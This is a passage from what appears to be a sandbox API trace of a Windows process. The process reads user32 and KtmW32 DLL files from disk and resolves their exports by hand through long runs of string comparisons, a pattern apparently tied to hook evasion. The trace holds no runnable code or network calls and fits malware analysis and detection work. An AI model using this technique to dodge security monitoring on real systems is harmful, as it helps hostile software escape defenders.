dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0147.432] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0147.432] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0147.432] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0147.432] GetProcessHeap () returned 0x470000 [0147.432] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1555b8) returned 0x4155040 [0147.435] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0147.435] ReadFile (in: hFile=0x17c, lpBuffer=0x4155040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4155040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0147.537] CloseHandle (hObject=0x17c) returned 1 [0147.537] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0147.537] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0147.537] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0147.537] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0147.537] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0147.538] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0147.538] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0147.538] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0147.538] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0147.538] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0147.538] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0147.538] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0147.538] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0147.538] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0147.538] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0147.538] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0147.538] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0147.538] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0147.538] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0147.538] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0147.538] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0147.538] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0147.538] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0147.538] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0147.538] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0147.538] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0147.538] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0147.539] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0147.539] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0147.539] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0147.539] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0147.540] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0147.540] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0147.540] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0147.540] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0147.540] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0147.540] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0147.541] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0147.541] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0147.541] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0147.541] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0147.541] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0147.541] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0147.541] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0147.541] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0147.542] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0147.542] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0147.542] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0147.542] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0147.542] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0147.542] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0147.542] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0147.542] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0147.543] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0147.543] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0147.544] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0147.545] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0147.546] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0148.067] GetProcessHeap () returned 0x470000 [0148.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4155040 | out: hHeap=0x470000) returned 1 [0148.089] GetProcessHeap () returned 0x470000 [0148.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489af0 [0148.089] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0148.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0148.094] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0148.094] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0148.094] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0148.094] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0148.095] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0148.095] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0148.095] GetProcessHeap () returned 0x470000 [0148.095] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5e00) returned 0x2d95030 [0148.095] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0148.095] ReadFile (in: hFile=0x17c, lpBuffer=0x2d95030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d95030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0148.096] CloseHandle (hObject=0x17c) returned 1 [0148.096] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0148.096] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0148.096] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0148.096] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0148.096] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0148.096] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0148.096] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0148.096] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0148.096] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0148.096] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0148.096] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0148.097] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0148.097] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0148.097] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0148.097] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0148.097] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0148.097] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0148.097] lstrcmpA (lpString1="CreateResourceManager", 